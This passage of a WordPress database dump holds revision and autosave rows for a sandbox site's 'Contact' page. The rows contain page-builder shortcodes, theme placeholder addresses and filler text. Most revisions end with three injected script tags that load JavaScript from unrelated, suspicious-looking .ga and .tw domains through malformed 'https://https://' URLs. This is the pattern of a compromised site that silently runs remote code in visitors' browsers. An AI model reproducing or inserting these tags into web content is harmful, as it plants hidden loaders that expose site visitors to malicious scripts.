src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2018-01-11 04:48:34','2018-01-11 04:48:34','',6370,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6370-revision-v1/',0,'revision','',0),(6652,1,'2018-01-11 05:03:32','2018-01-11 05:03:32','<p>[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"12%\" color_overlay=\"#005187\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Let\'s Make Things Happen</h1>\n<h6></h6>\n<p>[/vc_column_text][nectar_gmap zoom=\"1\" marker_style=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]</p>\n<h3>San Francisco</h3>\n<p>123 Nectar St. Suite 4917<br />\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]</p>\n<h3>British Columbia</h3>\n<p>58 Nectar Rd. Apt 2C<br />\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"6%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" bottom_padding=\"15\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]</p>\n<h6><span style=\"color: #1e83ec;\">Careers</span></h6>\n<h2>Want to work for us?</h2>\n<p>We\'re currently in look of a few new designers - If you\'re a passionate worker and think you have what it takes, send your resume and details to <a href=\"#\">jobs@demo.com</a> for all opportunities.[/vc_column_text][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]</p>\n<h2>A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</h2>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\n<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact','','inherit','closed','closed','','25-autosave-v1','','','2018-01-11 05:03:32','2018-01-11 05:03:32','',25,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/25-autosave-v1/',0,'revision','',0),(6653,1,'2018-01-11 05:05:00','2018-01-11 05:05:00','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"12%\" color_overlay=\"#005187\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">Let\'s Make Things Happen</h1>\r\n<h6></h6>\r\n[/vc_column_text][nectar_gmap zoom=\"15\" enable_zoom=\"1\" marker_style=\"default\" size=\"600\" map_center_lat=\"-6.1845997\" map_center_lng=\"106.7293611\" map_markers=\"-6.1845997|106.7293611|Our Location\r\n-6.1845999|106.7293621|Our Location 2\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"6%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" bottom_padding=\"15\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6><span style=\"color: #1e83ec;\">Careers</span></h6>\r\n<h2>Want to work for us?</h2>\r\nWe\'re currently in look of a few new designers - If you\'re a passionate worker and think you have what it takes, send your resume and details to <a href=\"#\">jobs@demo.com</a> for all opportunities.[/vc_column_text][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</h2>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact','','inherit','closed','closed','','25-revision-v1','','','2018-01-11 05:05:00','2018-01-11 05:05:00','',25,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/25-revision-v1/',0,'revision','',0),(6654,1,'2018-01-11 05:06:42','2018-01-11 05:06:42','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"12%\" color_overlay=\"#005187\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">Let\'s Make Things Happen</h1>\r\n<h6></h6>\r\n[/vc_column_text][nectar_gmap zoom=\"15\" enable_zoom=\"1\" marker_style=\"default\" size=\"600\" map_center_lat=\"-6.1845997\" map_center_lng=\"106.7293611\" map_markers=\"-6.1845997|106.7293611|Our Location\r\n-6.1785997|06.7218513|Our Location 2\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"6%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" bottom_padding=\"15\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6><span style=\"color: #1e83ec;\">Careers</span></h6>\r\n<h2>Want to work for us?</h2>\r\nWe\'re currently in look of a few new designers - If you\'re a passionate worker and think you have what it takes, send your resume and details to <a href=\"#\">jobs@demo.com</a> for all opportunities.[/vc_column_text][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</h2>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact','','inherit','closed','closed','','25-revision-v1','','','2018-01-11 05:06:42','2018-01-11 05:06:42','',25,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/25-revision-v1/',0,'revision','',0),(6655,1,'2018-01-11 05:07:21','2018-01-11 05:07:21','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"12%\" color_overlay=\"#005187\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">Let\'s Make Things Happen</h1>\r\n<h6></h6>\r\n[/vc_column_text][nectar_gmap zoom=\"15\" enable_zoom=\"1\" marker_style=\"default\" size=\"600\" map_center_lat=\"-6.1845997\" map_center_lng=\"106.7293611\" map_markers=\"-6.1845997|106.7293611|Our Location\r\n-6.1785997|106.7218513|Our Location 2\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"6%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" bottom_padding=\"15\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6><span style=\"color: #1e83ec;\">Careers</span></h6>\r\n<h2>Want to work for us?</h2>\r\nWe\'re currently in look of a few new designers - If you\'re a passionate worker and think you have what it takes, send your resume and details to <a href=\"#\">jobs@demo.com</a> for all opportunities.[/vc_column_text][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</h2>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact','','inherit','closed','closed','','25-revision-v1','','','2018-01-11 05:07:21','2018-01-11 05:07:21','',25,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/25-revision-v1/',0,'revision','',0),(6656,1,'2018-01-11 05:08:01','2018-01-11 05:08:01','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"12%\" color_overlay=\"#005187\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">Let\'s Make Things Happen</h1>\r\n<h6></h6>\r\n[/vc_column_text][nectar_gmap zoom=\"14\" enable_zoom=\"1\" marker_style=\"default\" size=\"600\" map_center_lat=\"-6.1845997\" map_center_lng=\"106.7293611\" map_markers=\"-6.1845997|106.7293611|Our Location\r\n-6.1785997|106.7218513|Our Location 2\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"6%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" bottom_padding=\"15\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6><span style=\"color: #1e83ec;\">Careers</span></h6>\r\n<h2>Want to work for us?</h2>\r\nWe\'re currently in look of a few new designers - If you\'re a passionate worker and think you have what it takes, send your resume and details to <a href=\"#\">jobs@demo.com</a> for all opportunities.[/vc_column_text][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</h2>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact','','inherit','closed','closed','','25-revision-v1','','','2018-01-11 05:08:01','2018-01-11 05:08:01','',25,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/25-revision-v1/',0,'revision','',0),(6657,1,'2018-01-11 05:09:58','2018-01-11 05:09:58','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"12%\" color_overlay=\"#005187\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">Let\'s Make Things Happen</h1>\r\n<h6></h6>\r\n[/vc_column_text][nectar_gmap zoom=\"14\" enable_zoom=\"1\" marker_style=\"default\" size=\"600\" map_center_lat=\"-6.1845997\" map_center_lng=\"106.7293611\" map_markers=\"-6.1845997|106.7293611|Our Location\r\n-6.1785997|106.7218513|Our Location 2\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" 